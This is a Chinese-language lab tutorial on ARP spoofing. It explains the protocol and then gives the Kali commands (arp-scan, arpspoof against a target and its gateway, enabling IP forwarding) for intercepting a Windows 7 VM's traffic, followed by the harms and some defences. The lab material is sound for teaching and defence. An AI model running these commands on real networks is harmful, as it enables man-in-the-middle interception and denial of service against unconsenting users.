目錄

一、環境

二、arp欺騙原理

三、arp欺騙操作

四、arp欺騙的危害

五、arp欺騙的防御

---

一、環境

VMware下的kali（攻擊機）、Windows 7 x64（目標機）

kali下載鏈接：

https://blog.csdn.net/Stupid__Angel/article/details/125939197

Windows 7 x64鏡像下載鏈接：

鏈接：https://pan.baidu.com/s/1dvZgIOi1zWBzqXM-EJgZ7A?pwd=abcd?
提取碼：abcd?
--來自百度網盤超級會員V1的分享

二、arp欺騙原理

什么ARP：地址解析協議（Address Resolution Protocol）

作用：根據IP地址解析獲取MAC地址

為什么需要MAC地址：

1、MAC地址在封裝時是鏈路層封裝的尋址的地址

2、交換機（二層）通過MAC地址分發數據包

參考知識：數據封裝、數據分用

ARP協議實現特點：

1、ARP協議特點：無狀態，無需請求可以應答

2、ARP實現：ARP緩存,動態即時刷新

三、arp欺騙操作

1、在Windows 7 x64的cmd中輸入ipconfig /all ，查看其網關和IP

2、再輸入arp -a ，查看ip與mac的對照表

?3、打開kali，輸入sudo su 進入root用戶，輸入ifconfig查看自己的ip

4、輸入arp-scan 192.168.230.1-192.168.230.254 查看是否與目標機在同一網段下

5、輸入arpspoof -i eth0 -t 192.168.230.24 192.168.230.2 ，表示對目標機，偽裝成其網關：

（發起攻擊網絡端口 eth0,攻擊目標：192.168.230.24，攻擊目標所在網關：192.168.190.2（虛擬機網關））

6、查看目標機（Windows 7 x64）的arp是否已經變化，由圖可知其網關的mac地址已經變化成了kali的mac地址：

7、echo 1 > /proc/sys/net/ipv4/ip_forward （是改變ip轉發的，1是使目標機能連外網）

四、arp欺騙的危害

1、ARP欺騙的危害-中間人攻擊

2、ARP欺騙的危害-終端斷網

原理：發送虛假ARP應答使得網絡中的計算機終端ARP緩存混亂，從而無法與其他計算機通信

實現方式（工具）： arpspoof

五、arp欺騙的防御

1、使用靜態ARP緩存

2、使用三層交換設備

3、IP 與MAC地址綁定

4、ARP防御工具

總結

以上是生活随笔為你收集整理的ARP欺骗-教程详解的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。